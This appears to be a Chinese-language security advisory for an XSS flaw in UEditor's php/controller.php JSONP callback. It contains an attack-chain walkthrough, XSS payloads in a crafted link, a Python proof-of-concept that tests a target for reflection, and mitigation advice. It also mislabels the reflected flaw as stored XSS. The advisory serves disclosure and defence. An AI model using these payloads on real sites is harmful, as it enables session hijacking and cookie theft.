CVE-2026-4186: UEditor 1.4.3.2及之前版本JSONP回调跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-4186

漏洞类型

跨站脚本（XSS）/JSONP注入

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

UEditor

漏洞概述

UEditor是一款广泛使用的开源富文本编辑器，由百度开发维护。该编辑器提供了丰富的文本编辑功能，包括图片上传、文件管理等核心功能。在UEditor 1.4.3.2及之前版本中，存在一处跨站脚本（XSS）漏洞，漏洞位于php/controller.php文件中的uploadimage动作处理模块。攻击者可以通过构造恶意的callback参数值，在JSONP响应中注入任意JavaScript代码。当受害者在浏览器中访问包含恶意callback参数的页面时，注入的脚本代码将会在受害者浏览器上下文中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全风险。该漏洞需要用户交互才能触发，攻击者需要诱导用户访问特制的链接或页面。由于该漏洞影响的是已不再被维护者支持的产品版本，官方可能不会发布安全更新补丁。

技术细节

该漏洞属于存储型JSONP回调跨站脚本漏洞。UEditor的php/controller.php文件在处理uploadimage动作请求时，会将用户提供的callback参数直接拼接到JSONP响应中返回给客户端。攻击者可以构造类似callback参数值为<script>alert(document.cookie)</script>或更复杂的XSS payload。当受害者的浏览器接收到包含恶意callback值的响应后，会将其作为JavaScript代码执行，从而触发XSS攻击。攻击者通常会结合社会工程学手段，诱导用户点击包含恶意callback参数的链接。由于该接口主要用于图片上传功能，攻击者可能通过此漏洞窃取用户的上传凭证或执行其他恶意操作。漏洞的利用条件包括：1）目标用户需登录并访问恶意链接；2）目标用户需与攻击者构造的页面产生交互。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先确认目标网站使用UEditor编辑器，并识别出php/controller.php接口的存在

STEP 2

步骤2：构造恶意链接

攻击者构造包含恶意XSS payload的callback参数链接，如：/php/controller.php?action=uploadimage&callback=<script>恶意代码</script>

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、即时通讯或其他渠道诱导目标用户点击特制的恶意链接

STEP 4

步骤4：XSS执行

当用户访问恶意链接时，UEditor将未经过滤的callback参数值包含在JSONP响应中返回，浏览器将其作为JavaScript执行

STEP 5

步骤5：窃取敏感信息

攻击者通过注入的JavaScript代码窃取用户Cookie、会话令牌或其他敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-4186 PoC - UEditor JSONP XSS
# Target: UEditor <= 1.4.3.2
# Vulnerability: XSS via callback parameter in php/controller.php?action=uploadimage

TARGET_URL = "http://target.com/ueditor/php/controller.php"

def test_xss():
    """Test for JSONP callback XSS vulnerability in UEditor"""
    
    # XSS payload in callback parameter
    xss_payload = "><script>alert('XSS')</script>"
    
    params = {
        "action": "uploadimage",
        "callback": xss_payload
    }
    
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        
        # Check if payload is reflected in response without encoding
        if xss_payload in response.text:
            print("[+] VULNERABLE: XSS payload reflected in response")
            print(f"[+] Response preview: {response.text[:500]}")
            return True
        else:
            print("[-] NOT VULNERABLE or target not found")
            return False
            
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    test_xss()

影响范围

UEditor <= 1.4.3.2

防御指南

临时缓解措施

由于该产品已停止维护，建议采取以下临时缓解措施：1）在Web应用层对callback参数进行严格过滤，仅允许字母、数字和下划线；2）配置Content-Security-Policy响应头限制脚本执行；3）使用成熟的WAF产品进行攻击防护；4）考虑替换为仍在维护的富文本编辑器；5）限制php/controller.php接口的访问权限，仅允许受信任的IP访问。